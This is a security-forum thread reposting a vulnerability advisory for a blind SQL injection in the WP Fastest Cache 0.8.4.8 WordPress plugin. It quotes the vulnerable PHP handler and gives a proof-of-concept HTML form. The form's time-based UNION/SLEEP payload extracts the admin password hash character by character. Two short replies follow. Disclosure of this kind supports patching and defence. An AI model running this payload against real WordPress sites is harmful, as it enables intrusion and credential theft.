查看: 14226|回复: 2

WordPress WP Fastest Cache插件注入漏洞

[复制链接]
发表于 2015-11-12 18:28:06 | 显示全部楼层 |阅读模式
版本:0.8.4.8

[PHP] 纯文本查看 复制代码
# Date: 11-11-2015
# Software Link: [url]https://wordpress.org/plugins/wp-fastest-cache/[/url]
# Exploit Author: Kacper Szurek
# Category: webapps
   
1. Description
     
For this vulnerabilities also WP-Polls needs to be installed.
  
Everyone can access wpfc_wppolls_ajax_request().
  
$_POST["poll_id"] is not escaped properly.
  
File: wp-fastest-cache\inc\wp-polls.php
  
public function wpfc_wppolls_ajax_request() {
    $id = strip_tags($_POST["poll_id"]);
    $id = mysql_real_escape_string($id);
  
    $result = check_voted($id);
  
    if($result){
        echo "true";
    }else{
        echo "false";
    }
    die();
}
  
[url]http://security.szurek.pl/wp-fastest-cache-0848-blind-sql-injection.html[/url]
  
2. Proof of Concept
  
<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wpfc_wppolls_ajax_request">
    <input type="text" name="poll_id" value="0 UNION (SELECT IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM `wp_users` WHERE ID = 1) -- ">
    <input type="submit" value="Send">
</form>
回复

使用道具 举报

发表于 2015-11-13 01:06:10 | 显示全部楼层
阿西吧  6666 正好去看看我的那个有这个插件没{:soso_e116:}
回复 支持 反对

使用道具 举报

发表于 2015-11-24 23:07:18 | 显示全部楼层
支持楼主,来学习学习
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-7 08:11 , Processed in 0.029734 second(s), 11 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部